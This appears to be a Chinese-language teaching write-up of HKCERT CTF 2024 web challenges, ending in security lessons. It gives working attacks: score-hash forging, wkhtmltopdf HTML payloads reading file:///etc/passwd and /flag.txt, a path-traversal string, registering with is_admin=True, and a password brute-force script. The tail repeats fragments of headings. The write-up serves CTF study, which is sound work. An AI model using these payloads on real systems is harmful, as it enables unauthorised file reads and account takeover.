HKCERT CTF 2024 Web题目解析与教学文档<\/h1>

1. 新免費午餐题目解析<\/h2>

1.1 题目概述<\/h3>
这是一个基于浏览器的点击游戏，玩家需要在60秒内尽可能多地点击黑色方块来获取分数。游戏结束后，分数会通过`update_score.php<\/code>接口提交到服务器。<\/p>`

1.2 关键代码分析<\/h3>
1.2.1 游戏逻辑<\/h4>

游戏创建4x4的网格，每行随机生成一个黑色方块<\/li>
点击黑色方块得分，点击白色方块游戏结束<\/li>
游戏时间60秒，结束后调用endGame()<\/code>函数<\/li>
<\/ul>
1.2.2 分数提交机制<\/h4>
async<\/span> function<\/span> endGame<\/span>() {
<\/span><\/span>    clearInterval<\/span>(gameInterval<\/span>);
<\/span><\/span>    clearInterval<\/span>(timerInterval<\/span>);
<\/span><\/span>    alert<\/span>('Game Over! Your score: '<\/span> +<\/span> score<\/span>);
<\/span><\/span>    
<\/span><\/span>    const<\/span> hash<\/span> =<\/span> generateHash<\/span>(secretKey<\/span> +<\/span> username<\/span> +<\/span> score<\/span>);
<\/span><\/span>    
<\/span><\/span>    fetch<\/span>('\/update_score.php'<\/span>, {
<\/span><\/span>        method<\/span>:<\/span> 'POST'<\/span>,
<\/span><\/span>        headers<\/span>:<\/span> {
<\/span><\/span>            'Content-Type'<\/span>:<\/span> 'application\/json'<\/span>,
<\/span><\/span>            'Authorization'<\/span>:<\/span> `Bearer <\/span>${<\/span>token<\/span>}<\/span>`<\/span>
<\/span><\/span>        },
<\/span><\/span>        body<\/span>:<\/span> JSON<\/span>.stringify<\/span>({
<\/span><\/span>            score<\/span>:<\/span> score<\/span>,
<\/span><\/span>            hash<\/span>:<\/span> hash<\/span>
<\/span><\/span>        })
<\/span><\/span>    })
<\/span><\/span>    .then<\/span>(response<\/span> => response<\/span>.json<\/span>())
<\/span><\/span>    .then<\/span>(data<\/span> => {
<\/span><\/span>        if<\/span> (data<\/span>.success<\/span>) {
<\/span><\/span>            alert<\/span>('Score updated!'<\/span>);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            alert<\/span>('Failed to update score.'<\/span>);
<\/span><\/span>        }
<\/span><\/span>        location<\/span>.reload<\/span>();
<\/span><\/span>    });
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.2.3 哈希生成方式<\/h4>
function<\/span> generateHash<\/span>(data<\/span>) {
<\/span><\/span>    return<\/span> sha256<\/span>(data<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>const<\/span> secretKey<\/span> =<\/span> '3636f69fcc3760cb130c1558ffef5e24'<\/span>;
<\/span><\/span>const<\/span> username<\/span> =<\/span> "a12345678"<\/span>;
<\/span><\/span>const<\/span> token<\/span> =<\/span> "605b9cfc7706342f2c9bdd45f48a9581"<\/span>;
<\/span><\/span><\/code><\/pre>1.3 漏洞点<\/h3>
哈希计算方式为sha256(secretKey + username + score)<\/code>，所有参数都暴露在前端代码中，攻击者可以：<\/p>

直接修改本地分数<\/li>
根据已知参数构造合法的哈希值<\/li>
提交任意高分到服务器<\/li>
<\/ol>
1.4 利用方法<\/h3>

修改本地score<\/code>变量为300（flag要求的分数）<\/li>
计算sha256("3636f69fcc3760cb130c1558ffef5e24" + "a12345678" + "300")<\/code><\/li>
构造POST请求提交分数<\/li>
<\/ol>
2. PDF生成器(1)题目解析<\/h2>
2.1 题目功能<\/h3>

提供URL输入框，将网页内容转换为PDF<\/li>
后端流程：

访问用户提供的URL<\/li>
将响应写入HTML文件<\/li>
使用wkhtmltopdf<\/code>将HTML转换为PDF<\/li>
<\/ol>
<\/li>
<\/ul>
2.2 漏洞分析<\/h3>

文件路径可控<\/strong>：通过修改sessionid可以控制html_file和pdf_file路径<\/li>
wkhtmltopdf漏洞<\/strong>：存在本地文件读取漏洞，可通过--enable-local-file-access<\/code>参数开启<\/li>
<\/ol>
2.3 利用方法<\/h3>

准备恶意HTML文件：<\/li>
<\/ol>
<script<\/span>>
<\/span><\/span>x<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>x<\/span>.open<\/span>("GET"<\/span>, 'file:\/\/\/etc\/passwd'<\/span>, false<\/span>);
<\/span><\/span>x<\/span>.send<\/span>();
<\/span><\/span>document.write<\/span>(x<\/span>.responseText<\/span>);
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>
分两步利用：

先不带参数访问创建文件<\/li>
再带--enable-local-file-access<\/code>参数访问读取flag<\/li>
<\/ul>
<\/li>
<\/ol>
3. PDF生成器(2)题目解析<\/h2>
3.1 与第一版的区别<\/h3>

使用pdfkit.from_string<\/code>代替直接命令执行<\/li>
但仍会从HTML的meta标签读取wkhtmltopdf参数<\/li>
<\/ul>
3.2 利用方法<\/h3>
构造包含以下meta标签的HTML：<\/p>
<meta<\/span> name<\/span>=<\/span>"pdfkit-enable-local-file-access"<\/span> content<\/span>=<\/span>""<\/span> \/>
<\/span><\/span><script<\/span>>
<\/span><\/span>x<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>x<\/span>.open<\/span>("GET"<\/span>, 'file:\/\/\/flag.txt'<\/span>, false<\/span>);
<\/span><\/span>x<\/span>.send<\/span>();
<\/span><\/span>document.write<\/span>(x<\/span>.responseText<\/span>);
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>4. 已知用火(1)题目解析<\/h2>
4.1 题目功能<\/h3>

提供文件读取功能<\/li>
路径拼接方式：public\/<\/code> + 用户输入<\/li>
后缀检查：必须是以.txt<\/code>结尾<\/li>
<\/ul>
4.2 漏洞分析<\/h3>

目录穿越<\/strong>：可以构造..\/..\/..\/etc\/passwd.txt<\/code>这样的路径<\/li>
长度限制<\/strong>：snprintf<\/code>限制为1024字节，减去public\/<\/code>的7字节，实际可用1017字节<\/li>
<\/ol>
4.3 利用方法<\/h3>
构造足够长的路径穿越到目标文件，并确保以.txt<\/code>结尾：<\/p>
..\/..\/..\/..\/..\/..\/..\/etc\/passwd.txt
<\/code><\/pre>
5. 米斯蒂茲的迷你CTF题目解析<\/h2>
5.1 题目(2)解析<\/h3>

存在api\/admin\/challenges<\/code>接口需要admin权限<\/li>
在96fa27cc07b9_init.py<\/code>中发现id为1337的题目，发布时间是365天后，描述中包含flag2<\/li>
<\/ul>
漏洞点<\/h4>
注册接口可以传入is_admin=True<\/code>直接注册管理员账户<\/p>
5.2 题目(1)解析<\/h3>

flag1存储在attempt表中<\/li>
可以通过登录普通用户(player)获取flag<\/li>
需要爆破用户密码<\/li>
<\/ul>
密码爆破方法<\/h4>
import<\/span> hashlib
<\/span><\/span>import<\/span> itertools
<\/span><\/span>import<\/span> concurrent.futures
<\/span><\/span>
<\/span><\/span>def<\/span> compute_hash<\/span>(password, salt):
<\/span><\/span>    return<\/span> salt +<\/span> '.'<\/span> +<\/span> hashlib.<\/span>sha256(f<\/span>'<\/span>{<\/span>salt}<\/span>\/<\/span>{<\/span>password}<\/span>'<\/span>.<\/span>encode()).<\/span>hexdigest()
<\/span><\/span>
<\/span><\/span>def<\/span> brute_force_find<\/span>(passwd, salt, charset, length):
<\/span><\/span>    for<\/span> password_tuple in<\/span> itertools.<\/span>product(charset, repeat=<\/span>length):
<\/span><\/span>        password =<\/span> ''<\/span>.<\/span>join(password_tuple)
<\/span><\/span>        res =<\/span> compute_hash(password, salt)
<\/span><\/span>        if<\/span> passwd in<\/span> res:
<\/span><\/span>            return<\/span> password
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    passwd =<\/span> "744c75c952ef0b49cdf77383a030795ff27ad54f20af8c71e6e9d705e5abfb94"<\/span>
<\/span><\/span>    salt =<\/span> "77364c85"<\/span>
<\/span><\/span>    charset =<\/span> '0123456789abcdef'<\/span>
<\/span><\/span>    length =<\/span> 6<\/span>
<\/span><\/span>    
<\/span><\/span>    with<\/span> concurrent.<\/span>futures.<\/span>ThreadPoolExecutor() as<\/span> executor:
<\/span><\/span>        futures =<\/span> [executor.<\/span>submit(brute_force_find, passwd, salt, charset, length) for<\/span> _ in<\/span> range(4<\/span>)]
<\/span><\/span>        for<\/span> future in<\/span> concurrent.<\/span>futures.<\/span>as_completed(futures):
<\/span><\/span>            result =<\/span> future.<\/span>result()
<\/span><\/span>            if<\/span> result:
<\/span><\/span>                print(result)
<\/span><\/span>                break<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>6. 总结与教学要点<\/h2>


前端安全<\/strong>：<\/p>

敏感信息不应暴露在前端代码中<\/li>
关键逻辑（如分数验证）应在服务端完成<\/li>
<\/ul>
<\/li>

文件操作安全<\/strong>：<\/p>

用户输入的文件路径必须严格过滤<\/li>
使用第三方工具时需了解其安全参数<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

关键接口必须进行严格的权限验证<\/li>
用户注册时不应允许直接设置权限标志<\/li>
<\/ul>
<\/li>

密码安全<\/strong>：<\/p>

使用强哈希算法（如SHA256加盐）<\/li>
但短密码仍可能被爆破，应设置足够复杂度要求<\/li>
<\/ul>
<\/li>

CTF解题技巧<\/strong>：<\/p>

仔细阅读前端代码，寻找硬编码的敏感信息<\/li>
分析所有可能的输入点，尝试各种注入方式<\/li>
了解常见工具的安全问题和配置参数<\/li>
<\/ul>
<\/li>
<\/ol>

HKCERT CTF 2024 Web题目解析与教学文档<\/h1>

1. 新免費午餐题目解析<\/h2>

1.1 题目概述<\/h3> 这是一个基于浏览器的点击游戏，玩家需要在60秒内尽可能多地点击黑色方块来获取分数。游戏结束后，分数会通过update_score.php<\/code>接口提交到服务器。<\/p>

2. PDF生成器(1)题目解析<\/h2>

3. PDF生成器(2)题目解析<\/h2>

4. 已知用火(1)题目解析<\/h2>

5. 米斯蒂茲的迷你CTF题目解析<\/h2>

漏洞点<\/h4> 注册接口可以传入is_admin=True<\/code>直接注册管理员账户<\/p>

1.1 题目概述<\/h3>
这是一个基于浏览器的点击游戏，玩家需要在60秒内尽可能多地点击黑色方块来获取分数。游戏结束后，分数会通过`update_score.php<\/code>接口提交到服务器。<\/p>`

漏洞点<\/h4>
注册接口可以传入`is_admin=True<\/code>直接注册管理员账户<\/p>`